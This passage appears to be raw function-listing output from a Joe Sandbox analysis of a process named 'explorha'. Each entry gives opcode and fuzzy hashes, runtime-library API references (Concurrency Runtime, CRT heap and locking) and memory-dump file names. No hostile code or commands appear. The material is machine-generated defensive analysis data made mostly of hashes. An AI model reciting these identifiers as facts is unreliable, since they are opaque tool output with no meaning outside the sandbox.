                                                                                                      • Opcode ID: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction ID: b05c6622cec164a70c840783034b95d437fbec275dcb87a659f4224268f2b486
                                                                                                      • Opcode Fuzzy Hash: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction Fuzzy Hash: 2201A577A04726692E143018AC026776798FBC3BB071D003EFC54F72C2EE94DC0141A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00881196
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                      • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                      • API String ID: 348560076-465693683
                                                                                                      • Opcode ID: e6068b3e5bbc165384ecf56c991d6ae4f9cd2bedcf5173dd26b770ebf110666b
                                                                                                      • Instruction ID: 150ceb59709d733deda076487db3b38dace13ad0d0081c211ca2e01b91cb0cbd
                                                                                                      • Opcode Fuzzy Hash: e6068b3e5bbc165384ecf56c991d6ae4f9cd2bedcf5173dd26b770ebf110666b
                                                                                                      • Instruction Fuzzy Hash: D90128A95423056AAF20B3BD5C4EEFB36DCFE82654720153AF550E3342FE78E8014365
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • StructuredWorkStealingQueue.LIBCMT ref: 00893744
                                                                                                        • Part of subcall function 0088E183: Mailbox.LIBCMT ref: 0088E1BD
                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00893755
                                                                                                      • StructuredWorkStealingQueue.LIBCMT ref: 0089378B
                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0089379C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                      • String ID: e
                                                                                                      • API String ID: 1411586358-4024072794
                                                                                                      • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                      • Instruction ID: ab48f8f4ceecdd8e4c9290085cfa78c87b7d93466501b621404b09daea18f85d
                                                                                                      • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                      • Instruction Fuzzy Hash: 11114FB5100109BBDF55FEADC985A6B73A5FF41368B1C8179EC06CF202DA71EA058B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • kernel32.dll, xrefs: 0087E6E1
                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0087E6D0
                                                                                                      • SleepConditionVariableCS, xrefs: 0087E6F2
                                                                                                      • WakeAllConditionVariable, xrefs: 0087E6FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ___scrt_fastfail
                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                      • API String ID: 2964418898-3242537097
                                                                                                      • Opcode ID: 7adb8ce1e5bdbaf8628ded1b4fc187501dc31bdb90f26116660124ef470b0a71
                                                                                                      • Instruction ID: ee11d19a7a560f14a439507dfafbfda35a997b62870a7c119fdd3be60ba68a8a
                                                                                                      • Opcode Fuzzy Hash: 7adb8ce1e5bdbaf8628ded1b4fc187501dc31bdb90f26116660124ef470b0a71
                                                                                                      • Instruction Fuzzy Hash: 9F01D6616C675225E6346E391C05FAB12A8FFE6B98B009174F858E7384DAB4ED008AA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 008A62B8
                                                                                                      • __alloca_probe_16.LIBCMT ref: 008A637E
                                                                                                      • __freea.LIBCMT ref: 008A63EA
                                                                                                        • Part of subcall function 0089C66B: RtlAllocateHeap.NTDLL(00000000,00878247,?,?,0087EA91,00878247,?,0087911B,8B18EC84,04980A5A), ref: 0089C69E
                                                                                                      • __freea.LIBCMT ref: 008A63F3
                                                                                                      • __freea.LIBCMT ref: 008A6416
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1423051803-0
                                                                                                      • Opcode ID: 14f05714d2c0e50e35e9ecdc354575af1fefea5ccb7e1f8904cb20a2fb005826
                                                                                                      • Instruction ID: b2c291f3c46c286b333b21ed192afa51e83fc622aa6e4d644995bb70cfa9beb1
                                                                                                      • Opcode Fuzzy Hash: 14f05714d2c0e50e35e9ecdc354575af1fefea5ccb7e1f8904cb20a2fb005826
                                                                                                      • Instruction Fuzzy Hash: 6C510172500216ABFF205F68CC81EAB3AA9FF86710F1D4128FD05EA644FB71CC2196A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 0088FFAE
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0088FFB6
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0088FFE0
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0088FFE9
                                                                                                      • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0089006C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 512098550-0
                                                                                                      • Opcode ID: 3e1660006fa218debb77f8dea5181aad01e89ca209321f341ffbf23000c64a13
                                                                                                      • Instruction ID: a6a5c6acc84248d20c445310c6160325cae872b2181447c1753a1852bb1d2f1d
                                                                                                      • Opcode Fuzzy Hash: 3e1660006fa218debb77f8dea5181aad01e89ca209321f341ffbf23000c64a13
                                                                                                      • Instruction Fuzzy Hash: 58413A35A00619AFCF09EF68C554A6DB7B5FF88310F148169E906EB391CB74AE01CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 0088037D
                                                                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 008803A7
                                                                                                        • Part of subcall function 00880A6D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00880A8A
                                                                                                      • __alloca_probe_16.LIBCMT ref: 008803E3
                                                                                                      • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00880424
                                                                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00880456
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2568206803-0
                                                                                                      • Opcode ID: 63b52478e97fcc797c4b016af217516f9f6319b8b146a122e1e4b563afa1a143
                                                                                                      • Instruction ID: c1090938701612503e42bb62236aa31ab9daeeece76c817485769eb310bef3b5
                                                                                                      • Opcode Fuzzy Hash: 63b52478e97fcc797c4b016af217516f9f6319b8b146a122e1e4b563afa1a143
                                                                                                      • Instruction Fuzzy Hash: FC317E71A002168BCB55EFA8C8415AEB7F4FF49314B244069E645F7341DB34DE4ACFA6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0088E9D4
                                                                                                      • ListArray.LIBCONCRT ref: 0088E9F7
                                                                                                      • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0088EA00
                                                                                                      • ListArray.LIBCONCRT ref: 0088EA38
                                                                                                      • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0088EA43
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                      • String ID:
                                                                                                      • API String ID: 4212520697-0
                                                                                                      • Opcode ID: 6720b31db85e61357b1692a598ecd5b3b1e05c1bb267552f9d8e580b64321404
                                                                                                      • Instruction ID: bcc5ae1ce4973508f77ad50b5a42b518d00800fb1d94f819c8649e5adad4149f
                                                                                                      • Opcode Fuzzy Hash: 6720b31db85e61357b1692a598ecd5b3b1e05c1bb267552f9d8e580b64321404
                                                                                                      • Instruction Fuzzy Hash: 4D318175700210AFDB19EF58C880BADBBA6FF89700F150099E806DB352DB70ED41CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _SpinWait.LIBCONCRT ref: 00889D7E
                                                                                                        • Part of subcall function 00880160: _SpinWait.LIBCONCRT ref: 00880178
                                                                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00889D92
                                                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00889DC4
                                                                                                      • List.LIBCMT ref: 00889E47
                                                                                                      • List.LIBCMT ref: 00889E56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 3281396844-0
                                                                                                      • Opcode ID: 1351bd237f9a62e0404815f7e63a109d74f97c502a9932a579afc39cc3c2fd6c
                                                                                                      • Instruction ID: fd708bc67b56bd68b758fb4f19aca5470ac647d297eed587867b2ea2a5e9ded6
                                                                                                      • Opcode Fuzzy Hash: 1351bd237f9a62e0404815f7e63a109d74f97c502a9932a579afc39cc3c2fd6c
                                                                                                      • Instruction Fuzzy Hash: 2F315931D01659DFCB14FFA8D5916EDBBB0FF04718F08406AD481A7642DB716D04CB96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00892F31
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00892F78
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pContext
                                                                                                      • API String ID: 3390424672-2046700901
                                                                                                      • Opcode ID: 5bdf6d43930f6311c070bb0a625b31e277d04d298e660ab852562138f4685098
                                                                                                      • Instruction ID: b08ea1215bac864399b096d88feab6755119d87f94b407950b3daed6311bca69
                                                                                                      • Opcode Fuzzy Hash: 5bdf6d43930f6311c070bb0a625b31e277d04d298e660ab852562138f4685098
                                                                                                      • Instruction Fuzzy Hash: 8A21B531700A15ABCF29BB28D895AADB3B9FF94324B08011AF511D76D1CF74EC468B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • List.LIBCONCRT ref: 0088C57A
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0088C59F
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0088C5DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                      • String ID: pExecutionResource
                                                                                                      • API String ID: 1772865662-359481074
                                                                                                      • Opcode ID: c382324970ae04276a15d4dd141014614eb6085dbc26a8fb7def8791d28cab26
                                                                                                      • Instruction ID: 6dde7ef637fc5239af9aa0d055be580498a238c6b2e243002ad652f41eac4dc2
                                                                                                      • Opcode Fuzzy Hash: c382324970ae04276a15d4dd141014614eb6085dbc26a8fb7def8791d28cab26
                                                                                                      • Instruction Fuzzy Hash: 65219371600205ABCF08EFA8C842BADB7B5FF48300F14406DF505EB685DBB4EE058BA6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 008865B4
                                                                                                      • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 008865F6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                      • String ID: count$ppVirtualProcessorRoots
                                                                                                      • API String ID: 2663199487-3650809737
                                                                                                      • Opcode ID: 979d534248629500317a150ee84c65a75630df0301b726d6f55b27f94d86ac47
                                                                                                      • Instruction ID: 103b931c9a57edf3f469f460dff89d413848ec63ac766c9200ee79b47210acf8
                                                                                                      • Opcode Fuzzy Hash: 979d534248629500317a150ee84c65a75630df0301b726d6f55b27f94d86ac47
                                                                                                      • Instruction Fuzzy Hash: 4021BD34600619AFCB08EF68C891EAD77B1FF08300F044069F50ADB691DB71EA11CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0088D09E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                      • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                      • API String ID: 348560076-3997890769
                                                                                                      • Opcode ID: 06743c52cd1c2598ce153c33d164d3106d502abe49f52457e6221059c066fb28
                                                                                                      • Instruction ID: e7378a2ff01fd09d7c82aaf53432cb0440771e30069cc9cf9e85c76d7c52e4f8
                                                                                                      • Opcode Fuzzy Hash: 06743c52cd1c2598ce153c33d164d3106d502abe49f52457e6221059c066fb28
                                                                                                      • Instruction Fuzzy Hash: 42012D7058571165EB24B7B50C05FBF369CFF41348F205839E580F2281EE34DA0687A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SafeRWList.LIBCONCRT ref: 00888503
                                                                                                        • Part of subcall function 008864FE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0088650F
                                                                                                        • Part of subcall function 008864FE: List.LIBCMT ref: 00886519
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00888515
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0088853A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                      • String ID: eventObject
                                                                                                      • API String ID: 1288476792-1680012138
                                                                                                      • Opcode ID: c93997f0c2cc1333ab58705e645125643f826c4c0a8b4905ebd1967e8a3e2523
                                                                                                      • Instruction ID: 1a59cdd6036972d7aa92de600861f68657351bc9bde0d5b8e6607c2267cd445a
                                                                                                      • Opcode Fuzzy Hash: c93997f0c2cc1333ab58705e645125643f826c4c0a8b4905ebd1967e8a3e2523
                                                                                                      • Instruction Fuzzy Hash: B111C271540208E6DB28F7A8CC46FEE73A8FF01754FA04168B515E61C2EF74EA048765
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0088B792
                                                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0088B7B6
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0088B7C9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pScheduler
                                                                                                      • API String ID: 246774199-923244539
                                                                                                      • Opcode ID: b43bc8cb043be55496daa360bcca8dec94dba39493d2fa30aebfc9bd474db442
                                                                                                      • Instruction ID: 34298ef573ab9fb435c4c96f24176464ec950b023c1f58800be3a88ef9fa689a
                                                                                                      • Opcode Fuzzy Hash: b43bc8cb043be55496daa360bcca8dec94dba39493d2fa30aebfc9bd474db442
                                                                                                      • Instruction Fuzzy Hash: 4EF0B43554070867CB24FA28D852DAEB379FEC0761724452DE416D7286DB74ED06C792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                      • Instruction ID: d5b07ae4540bffbf3c9dc836fe3e5f6872c2b172b861e843d638aaa14b598de3
                                                                                                      • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                      • Instruction Fuzzy Hash: 8CB12232A046959FDF11EF68C881BAEBFA5FF56300F2C816AE841DB342D6349D01CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: 71c39fc8e3a8f4272ed89a294f0aec48ebbfe227afab4648f45b2b84c991fb9c
                                                                                                      • Instruction ID: 45ebb693e9e57372111ceb69fdb768bb6ba3b0e0678374062eaf07aeb65dc008
                                                                                                      • Opcode Fuzzy Hash: 71c39fc8e3a8f4272ed89a294f0aec48ebbfe227afab4648f45b2b84c991fb9c
                                                                                                      • Instruction Fuzzy Hash: 8551C072A00606AFDF29AF58C941BAA77A5FF10314F18453DE846E7291FB31ECA0D791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: EqualOffsetTypeids
                                                                                                      • String ID:
                                                                                                      • API String ID: 1707706676-0
                                                                                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction ID: d46a8b5419ea6fef3d0aaf15578c9bae5f7cc0d8681612a30ff24cfbbcf00fb7
                                                                                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction Fuzzy Hash: 2451A935A042199FDF11EFA8C9806AEBBF1FF15314F18449AE841E7351E732A919CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0088F1F4
                                                                                                        • Part of subcall function 0088A5BF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0088A5E0
                                                                                                      • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0088F253
                                                                                                      • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0088F279
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 0088F2E6
                                                                                                      Memory Dump Source
